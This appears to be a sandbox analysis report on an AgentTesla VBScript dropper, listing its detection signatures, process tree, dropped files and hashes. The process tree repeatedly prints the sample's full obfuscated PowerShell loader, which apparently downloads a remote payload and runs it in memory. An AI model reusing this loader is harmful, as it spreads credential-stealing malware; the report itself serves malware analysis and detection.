Overview

overview

10

Static

static

1

SOA.vbs

windows7-x64

8

SOA.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    134s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 18:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SOA.vbs

  • Size

    379KB

  • MD5

    ce9650c94c571b5f52bfa309d6b3fc8d

  • SHA1

    52d7bc1dfb97e949aa9907bf6cd48fc05fc19ad1

  • SHA256

    f0b9b0709d906b96267804708a14f5f40b33518b558d8041776c9b62f3b36824

  • SHA512

    35fc9c81f23066736ba690529b78f98466ab2c03f290df75841b865c46a49a65f3a3837f3c64f838a2c3fb0da557d877fc4ae13290953f441871779d98ec9da1

  • SSDEEP

    1536:09MDsyDWF5fExMw/j3OBYXMecOXcggQkbN8tgSgftATlon4EFcXAwpEu+WCzW4GO:OM1WFypTOBYXMecOXcggQkbVx

Score
10/10
agenttesladiscoveryexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Agenttesla family
    agenttesla
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOA.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#H##aQBs#G8#bQBh#C##PQ#g#Cc#d#B4#HQ#LgBl#Gw#aQBG#GQ#ZQB0#HI#ZQB2#G4#bwBD#C8#bQBv#GM#LgBz#HQ#bgBl#G0#d#Bp#HU#cgBj#GU#cgB0#G4#ZQBs#GE#d##v#C8#OgBz#H##d#B0#Gg#Jw#7#CQ#c#B1#H##dQBz#GU#cgBp#GE#I##9#C##J#Bz#H##aQBs#G8#bQBh#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#B2#G8#d#Bh#GI#b#Bl#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HQ#YQBs#GU#bgB0#HI#ZQBj#HI#dQBp#HQ#bQBl#G4#d#Bz#C4#YwBv#G0#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#GU#bgBk#G8#bQB5#HM#aQB1#G0#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#aQBu#GM#b#B1#HM#aQBi#Gw#ZQ#g#D0#I##k#GU#bgBk#G8#bQB5#HM#aQB1#G0#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBv#HQ#YQBi#Gw#ZQ#p#Ds#J#Br#GE#awBr#GU#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bp#G4#YwBs#HU#cwBp#GI#b#Bl#Ck#Ow#k#GY#ZQBk#GU#cgBh#HQ#aQB2#GU#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#GE#dQBk#Gk#bwB3#GE#cgBl#Ho#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#dwBl#Gw#ZgBh#HI#aQBz#HQ#I##9#C##J#Br#GE#awBr#GU#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#GU#Z#Bl#HI#YQB0#Gk#dgBl#Ck#Ow#k#HM#d#Bl#GU#b#B5#GE#cgBk#C##PQ#g#CQ#awBh#Gs#awBl#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB1#GQ#aQBv#Hc#YQBy#GU#eg#p#Ds#J#B3#GU#b#Bm#GE#cgBp#HM#d##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#HM#d#Bl#GU#b#B5#GE#cgBk#C##LQBn#HQ#I##k#Hc#ZQBs#GY#YQBy#Gk#cwB0#Ds#J#B3#GU#b#Bm#GE#cgBp#HM#d##g#Cs#PQ#g#CQ#ZgBl#GQ#ZQBy#GE#d#Bp#HY#ZQ#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bl#GE#cgB0#Gg#aQBl#HI#I##9#C##J#Bz#HQ#ZQBl#Gw#eQBh#HI#Z##g#C0#I##k#Hc#ZQBs#GY#YQBy#Gk#cwB0#Ds#J#Br#Gw#ZQBw#Gg#d#Bp#GM#I##9#C##J#Br#GE#awBr#GU#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#dwBl#Gw#ZgBh#HI#aQBz#HQ#L##g#CQ#ZQBh#HI#d#Bo#Gk#ZQBy#Ck#Ow#k#HI#a#Bv#GQ#YQBt#Gk#bgBl#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#Gs#b#Bl#H##a#B0#Gk#Yw#p#Ds#J#By#G8#ZwBn#GE#bg#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#Gg#bwBk#GE#bQBp#G4#ZQ#p#Ds#J#Bm#GU#YQB0#HU#cgBl#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#c#B1#H##dQBz#GU#cgBp#GE#L##n#Cc#L##n#Cc#L##n#Cc#L##n#E0#UwBC#HU#aQBs#GQ#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#cwB1#HQ#d#Bs#GU#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#FM#YQBs#GE#ZwBy#GE#bQBh#HM#Jw#s#Cc#Mg#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:6088
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\suttle.vbs"
        3⤵
          PID:3020
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1168
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\ProgramData\suttle.vbs
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#H##aQBs#G8#bQBh#C##PQ#g#Cc#d#B4#HQ#LgBl#Gw#aQBG#GQ#ZQB0#HI#ZQB2#G4#bwBD#C8#bQBv#GM#LgBz#HQ#bgBl#G0#d#Bp#HU#cgBj#GU#cgB0#G4#ZQBs#GE#d##v#C8#OgBz#H##d#B0#Gg#Jw#7#CQ#c#B1#H##dQBz#GU#cgBp#GE#I##9#C##J#Bz#H##aQBs#G8#bQBh#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#B2#G8#d#Bh#GI#b#Bl#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HQ#YQBs#GU#bgB0#HI#ZQBj#HI#dQBp#HQ#bQBl#G4#d#Bz#C4#YwBv#G0#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#GU#bgBk#G8#bQB5#HM#aQB1#G0#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#aQBu#GM#b#B1#HM#aQBi#Gw#ZQ#g#D0#I##k#GU#bgBk#G8#bQB5#HM#aQB1#G0#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBv#HQ#YQBi#Gw#ZQ#p#Ds#J#Br#GE#awBr#GU#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bp#G4#YwBs#HU#cwBp#GI#b#Bl#Ck#Ow#k#GY#ZQBk#GU#cgBh#HQ#aQB2#GU#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#GE#dQBk#Gk#bwB3#GE#cgBl#Ho#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#dwBl#Gw#ZgBh#HI#aQBz#HQ#I##9#C##J#Br#GE#awBr#GU#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#GU#Z#Bl#HI#YQB0#Gk#dgBl#Ck#Ow#k#HM#d#Bl#GU#b#B5#GE#cgBk#C##PQ#g#CQ#awBh#Gs#awBl#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB1#GQ#aQBv#Hc#YQBy#GU#eg#p#Ds#J#B3#GU#b#Bm#GE#cgBp#HM#d##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#HM#d#Bl#GU#b#B5#GE#cgBk#C##LQBn#HQ#I##k#Hc#ZQBs#GY#YQBy#Gk#cwB0#Ds#J#B3#GU#b#Bm#GE#cgBp#HM#d##g#Cs#PQ#g#CQ#ZgBl#GQ#ZQBy#GE#d#Bp#HY#ZQ#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bl#GE#cgB0#Gg#aQBl#HI#I##9#C##J#Bz#HQ#ZQBl#Gw#eQBh#HI#Z##g#C0#I##k#Hc#ZQBs#GY#YQBy#Gk#cwB0#Ds#J#Br#Gw#ZQBw#Gg#d#Bp#GM#I##9#C##J#Br#GE#awBr#GU#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#dwBl#Gw#ZgBh#HI#aQBz#HQ#L##g#CQ#ZQBh#HI#d#Bo#Gk#ZQBy#Ck#Ow#k#HI#a#Bv#GQ#YQBt#Gk#bgBl#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#Gs#b#Bl#H##a#B0#Gk#Yw#p#Ds#J#By#G8#ZwBn#GE#bg#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#Gg#bwBk#GE#bQBp#G4#ZQ#p#Ds#J#Bm#GU#YQB0#HU#cgBl#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#c#B1#H##dQBz#GU#cgBp#GE#L##n#Cc#L##n#Cc#L##n#Cc#L##n#E0#UwBC#HU#aQBs#GQ#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#cwB1#HQ#d#Bs#GU#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#FM#YQBs#GE#ZwBy#GE#bQBh#HM#Jw#s#Cc#Mg#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3736
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
            PID:2028
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5280
      • C:\Windows\system32\wscript.exe
        wscript.exe C:\ProgramData\suttle.vbs
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3540
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#H##aQBs#G8#bQBh#C##PQ#g#Cc#d#B4#HQ#LgBl#Gw#aQBG#GQ#ZQB0#HI#ZQB2#G4#bwBD#C8#bQBv#GM#LgBz#HQ#bgBl#G0#d#Bp#HU#cgBj#GU#cgB0#G4#ZQBs#GE#d##v#C8#OgBz#H##d#B0#Gg#Jw#7#CQ#c#B1#H##dQBz#GU#cgBp#GE#I##9#C##J#Bz#H##aQBs#G8#bQBh#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#B2#G8#d#Bh#GI#b#Bl#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HQ#YQBs#GU#bgB0#HI#ZQBj#HI#dQBp#HQ#bQBl#G4#d#Bz#C4#YwBv#G0#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#Cc#Ow#k#GU#bgBk#G8#bQB5#HM#aQB1#G0#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#aQBu#GM#b#B1#HM#aQBi#Gw#ZQ#g#D0#I##k#GU#bgBk#G8#bQB5#HM#aQB1#G0#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBv#HQ#YQBi#Gw#ZQ#p#Ds#J#Br#GE#awBr#GU#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bp#G4#YwBs#HU#cwBp#GI#b#Bl#Ck#Ow#k#GY#ZQBk#GU#cgBh#HQ#aQB2#GU#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#GE#dQBk#Gk#bwB3#GE#cgBl#Ho#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#dwBl#Gw#ZgBh#HI#aQBz#HQ#I##9#C##J#Br#GE#awBr#GU#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#GU#Z#Bl#HI#YQB0#Gk#dgBl#Ck#Ow#k#HM#d#Bl#GU#b#B5#GE#cgBk#C##PQ#g#CQ#awBh#Gs#awBl#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB1#GQ#aQBv#Hc#YQBy#GU#eg#p#Ds#J#B3#GU#b#Bm#GE#cgBp#HM#d##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#HM#d#Bl#GU#b#B5#GE#cgBk#C##LQBn#HQ#I##k#Hc#ZQBs#GY#YQBy#Gk#cwB0#Ds#J#B3#GU#b#Bm#GE#cgBp#HM#d##g#Cs#PQ#g#CQ#ZgBl#GQ#ZQBy#GE#d#Bp#HY#ZQ#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bl#GE#cgB0#Gg#aQBl#HI#I##9#C##J#Bz#HQ#ZQBl#Gw#eQBh#HI#Z##g#C0#I##k#Hc#ZQBs#GY#YQBy#Gk#cwB0#Ds#J#Br#Gw#ZQBw#Gg#d#Bp#GM#I##9#C##J#Br#GE#awBr#GU#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#dwBl#Gw#ZgBh#HI#aQBz#HQ#L##g#CQ#ZQBh#HI#d#Bo#Gk#ZQBy#Ck#Ow#k#HI#a#Bv#GQ#YQBt#Gk#bgBl#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#Gs#b#Bl#H##a#B0#Gk#Yw#p#Ds#J#By#G8#ZwBn#GE#bg#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#Gg#bwBk#GE#bQBp#G4#ZQ#p#Ds#J#Bm#GU#YQB0#HU#cgBl#C##PQ#g#Fs#Z#Bu#Gw#aQBi#C4#SQBP#C4#S#Bv#G0#ZQBd#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#FY#QQBJ#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##Q##o#CQ#c#B1#H##dQBz#GU#cgBp#GE#L##n#Cc#L##n#Cc#L##n#Cc#L##n#E0#UwBC#HU#aQBs#GQ#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#cwB1#HQ#d#Bs#GU#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#FM#YQBs#GE#ZwBy#GE#bQBh#HM#Jw#s#Cc#Mg#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
              PID:5300
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              3⤵
                PID:2072
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                3⤵
                  PID:3524
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  3⤵
                    PID:1788
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    3⤵
                      PID:3060

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\suttle.vbs
                  Filesize

                  379KB

                  MD5

                  9edef0f81796932eb68a7d2336363bc4

                  SHA1

                  e7357ee3a4140dd7bb3e35088c1c503ee31e8561

                  SHA256

                  3913a06768480bf826b3f49fbd5422d3551d8a8e004d3b06483b08fdf7a4c8f8

                  SHA512

                  047233794937c73844bc47864a7a2ea4dede107f9c3bc6ab79e5307c09e596d2ebf48cf40bb039ec99d64e429184a33938fcd3bb6136f716a0e3ef1539f1f82d

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                  Filesize

                  3KB

                  MD5

                  f41839a3fe2888c8b3050197bc9a0a05

                  SHA1

                  0798941aaf7a53a11ea9ed589752890aee069729

                  SHA256

                  224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

                  SHA512

                  2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  1KB

                  MD5

                  2c1587b908222f3979daea3c6a7b011b

                  SHA1

                  564ec7d33a50f8b7eb0fae2e9d3cb4bc724186a5

                  SHA256

                  7450565b0494ad3efcfd22b4f61b8dbb528b788e5cd197fd11a59bf31933a9fc

                  SHA512

                  785944864199cdf21ce5d3601a5c9e860f661cb5ecfbca8451147a439aec9317b60281ebc276304dd04d42af8f5dbd265a21aa3bbffe220913cff17eb6d3cb9a

                  Download Submit

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  1KB

                  MD5

                  142244437baadf9a71948c3ab12542aa

                  SHA1

                  cf281dde69fcbd09b54be201839f0ac990032607

                  SHA256

                  b39d9b96659956ad141ee9809ff2fd408156f0fa48fcda257a3aa06dbf6d1c88

                  SHA512

                  08299b99de236d8b76d2d409d0715576a379cdee0b68cfcd14a38eecdfc31405126ae7edd6e797ad177b76c5f39444bfb56dd04e5f14a902e62154cc2954bddc

                  Download Submit

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxucdgl1.tzu.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  Download Submit

                • memory/1168-22-0x0000000006280000-0x00000000062D0000-memory.dmp

                  Filesize

                  320KB

                  Download

                • memory/1168-24-0x0000000006300000-0x000000000630A000-memory.dmp

                  Filesize

                  40KB

                  Download

                • memory/1168-16-0x0000000000400000-0x0000000000440000-memory.dmp

                  Filesize

                  256KB

                  Download

                • memory/1168-23-0x0000000006370000-0x0000000006402000-memory.dmp

                  Filesize

                  584KB

                  Download

                • memory/1168-20-0x0000000005480000-0x0000000005A24000-memory.dmp

                  Filesize

                  5.6MB

                  Download

                • memory/1168-21-0x0000000004E40000-0x0000000004EA6000-memory.dmp

                  Filesize

                  408KB

                  Download

                • memory/6088-12-0x00007FFE95F50000-0x00007FFE96A11000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/6088-19-0x00007FFE95F50000-0x00007FFE96A11000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/6088-14-0x00000257B8D30000-0x00000257B8D3C000-memory.dmp

                  Filesize

                  48KB

                  Download

                • memory/6088-13-0x00000257B8B70000-0x00000257B8D2E000-memory.dmp

                  Filesize

                  1.7MB

                  Download

                • memory/6088-0-0x00007FFE95F53000-0x00007FFE95F55000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/6088-11-0x00007FFE95F50000-0x00007FFE96A11000-memory.dmp

                  Filesize

                  10.8MB

                  Download

                • memory/6088-10-0x00000257B87D0000-0x00000257B87F2000-memory.dmp

                  Filesize

                  136KB

                  Download